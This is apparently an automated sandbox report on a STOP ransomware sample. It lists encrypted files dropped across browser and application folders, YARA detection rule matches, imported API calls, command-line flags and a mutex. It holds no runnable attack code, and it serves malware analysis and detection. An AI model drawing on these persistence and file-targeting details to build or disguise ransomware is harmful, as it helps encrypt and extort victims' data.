              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99831792079Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99865889579Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498356744920266.txt entropy: 7.99852303917Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945549071925.txt entropy: 7.99786735486Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99839446175Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99732723421Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99853111382Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99755528807Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99393233319Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99862984651Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99412319146Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99764579868Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.9981973835Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\setup32.exe_Rules.xml entropy: 7.99869047943Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct443C.tmp.ppvw (copy) entropy: 7.99699310807Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.ppvw (copy) entropy: 7.99710290026Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.ppvw (copy) entropy: 7.9976240835Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.ppvw (copy) entropy: 7.99692804308Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.ppvw (copy) entropy: 7.99765308787Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.ppvw (copy) entropy: 7.99737774376Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF411.tmp.ppvw (copy) entropy: 7.99734330282Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.ppvw (copy) entropy: 7.99172098852Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.ppvw (copy) entropy: 7.99734304608Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.ppvw (copy) entropy: 7.99658111469Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Edge\User Data\CrashpadMetrics-active.pma.ppvw (copy) entropy: 7.99074000166Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.ppvw (copy) entropy: 7.99049189549Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\16.0\setup32.exe_Rules.xml.ppvw (copy) entropy: 7.99869047943Jump to dropped file

              System Summary

              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000000.1671969796.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000000.1664627925.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000000.1827821890.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000002.1757288854.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: 00000000.00000000.1646052396.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: 00000006.00000002.1839495564.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: 00000004.00000000.1745023046.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7476, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7568, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7620, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7708, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7868, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPED, Matched rule: Windows_Ransomware_Stop_1e8d48ff, Author: unknown
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPED, Matched rule: Detects STOP ransomware, Author: ditekSHen
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3DD404_2_00E3DD40
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E36EE04_2_00E36EE0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E5CE514_2_00E5CE51
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E79FE34_2_00E79FE3
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E39F764_2_00E39F76
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E50F304_2_00E50F30
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 0048F7C0 appears 129 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00485007 appears 32 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00488520 appears 136 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00482587 appears 48 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004A1A25 appears 44 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004AF26C appears 41 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00488C81 appears 74 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004B4E50 appears 62 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004B0870 appears 52 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004B47A0 appears 64 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00480EC2 appears 40 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004AF23E appears 108 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E52587 appears 48 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E7F26C appears 41 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E71A25 appears 44 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E5F7C0 appears 129 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E50EC2 appears 40 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E847A0 appears 64 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E58520 appears 136 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E84E50 appears 62 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E80870 appears 52 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E58C81 appears 74 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E7F23E appears 108 times
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPEDMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: classification engine, Classification label: mal100.rans.spre.troj.evad.winEXE@8/1287@4/2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Code function: 0_2_00471900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,0_2_00471900
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Code function: 0_2_00472440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00472440
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Code function: 0_2_0046D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,0_2_0046D240
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Admin,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsAutoStart,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: IsTask,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --ForNetRes,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Task,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --AutoStart,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: --Service,0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Command line argument: X1V,0_2_00479F90
